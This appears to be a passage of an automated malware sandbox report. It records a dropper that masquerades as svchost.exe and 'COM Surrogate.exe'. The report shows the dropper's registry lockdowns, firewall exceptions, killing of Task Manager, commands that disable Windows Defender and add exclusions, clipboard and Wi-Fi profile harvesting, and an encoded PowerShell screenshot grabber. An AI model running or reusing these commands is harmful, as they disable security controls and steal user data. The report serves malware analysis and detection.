Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: SeDebugPrivilege	4960	COM Surrogate.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: 33	4960	COM Surrogate.exe
Token: SeIncBasePriorityPrivilege	4960	COM Surrogate.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
2420	tmp7F2A.tmp.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
2420	tmp7F2A.tmp.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe
4480	vlc.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
556	CredentialUIBroker.exe
3292	CredentialUIBroker.exe
4016	CredentialUIBroker.exe
4480	vlc.exe
5728	chrome.exe
1364	OpenWith.exe
1364	OpenWith.exe
1364	OpenWith.exe
1364	OpenWith.exe
1364	OpenWith.exe
5712	mspaint.exe
5712	mspaint.exe
5712	mspaint.exe
5712	mspaint.exe
5800	mspaint.exe
5800	mspaint.exe
5800	mspaint.exe
5800	mspaint.exe
3824	tmp9993.tmp.exe
3824	tmp9993.tmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2896	2380	ahhdaddyServer.exe	91
PID 2380 wrote to memory of 2896	2380	ahhdaddyServer.exe	91
PID 2380 wrote to memory of 2896	2380	ahhdaddyServer.exe	91
PID 2896 wrote to memory of 3344	2896	svchost.exe	92
PID 2896 wrote to memory of 3344	2896	svchost.exe	92
PID 2896 wrote to memory of 3344	2896	svchost.exe	92
PID 2896 wrote to memory of 3760	2896	svchost.exe	94
PID 2896 wrote to memory of 3760	2896	svchost.exe	94
PID 2896 wrote to memory of 3760	2896	svchost.exe	94
PID 2896 wrote to memory of 1752	2896	svchost.exe	97
PID 2896 wrote to memory of 1752	2896	svchost.exe	97
PID 2896 wrote to memory of 1752	2896	svchost.exe	97
PID 1752 wrote to memory of 4960	1752	tmp91FF.tmp.exe	98
PID 1752 wrote to memory of 4960	1752	tmp91FF.tmp.exe	98
PID 1752 wrote to memory of 4960	1752	tmp91FF.tmp.exe	98
PID 4960 wrote to memory of 3956	4960	COM Surrogate.exe	100
PID 4960 wrote to memory of 3956	4960	COM Surrogate.exe	100
PID 4960 wrote to memory of 3956	4960	COM Surrogate.exe	100
PID 4960 wrote to memory of 4288	4960	COM Surrogate.exe	102
PID 4960 wrote to memory of 4288	4960	COM Surrogate.exe	102
PID 4960 wrote to memory of 4288	4960	COM Surrogate.exe	102
PID 4240 wrote to memory of 2092	4240	chrome.exe	108
PID 4240 wrote to memory of 2092	4240	chrome.exe	108
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 4952	4240	chrome.exe	109
PID 4240 wrote to memory of 2120	4240	chrome.exe	110
PID 4240 wrote to memory of 2120	4240	chrome.exe	110
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111
PID 4240 wrote to memory of 1848	4240	chrome.exe	111

System policy modification 1 TTPs 37 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1"	tmp1CB2.tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1"	tmp1CB2.tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum	tmp1CB2.tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall	tmp1CB2.tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1"	tmp1CB2.tmp.exe

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5700	attrib.exe
6136	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ahhdaddyServer.exe
"C:\Users\Admin\AppData\Local\Temp\ahhdaddyServer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops autorun.inf file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:3344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Taskmgr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3760
- - C:\Users\Admin\AppData\Local\Temp\tmp91FF.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp91FF.tmp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\ProgramData\COM Surrogate.exe
      "C:\ProgramData\COM Surrogate.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4960
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\COM Surrogate.exe" "COM Surrogate.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:3956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM SecHealthUI.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4288
    - - C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe"
        5⤵
        Executes dropped EXE
        
        PID:4504
      - C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe'"
        7⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tmpCD54.tmp.exe'
        8⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        7⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        7⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        8⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:2032
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        7⤵
        
        PID:8
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        8⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        7⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        8⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:668
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        7⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        8⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        7⤵
        
        PID:212
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:6112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        7⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        8⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzA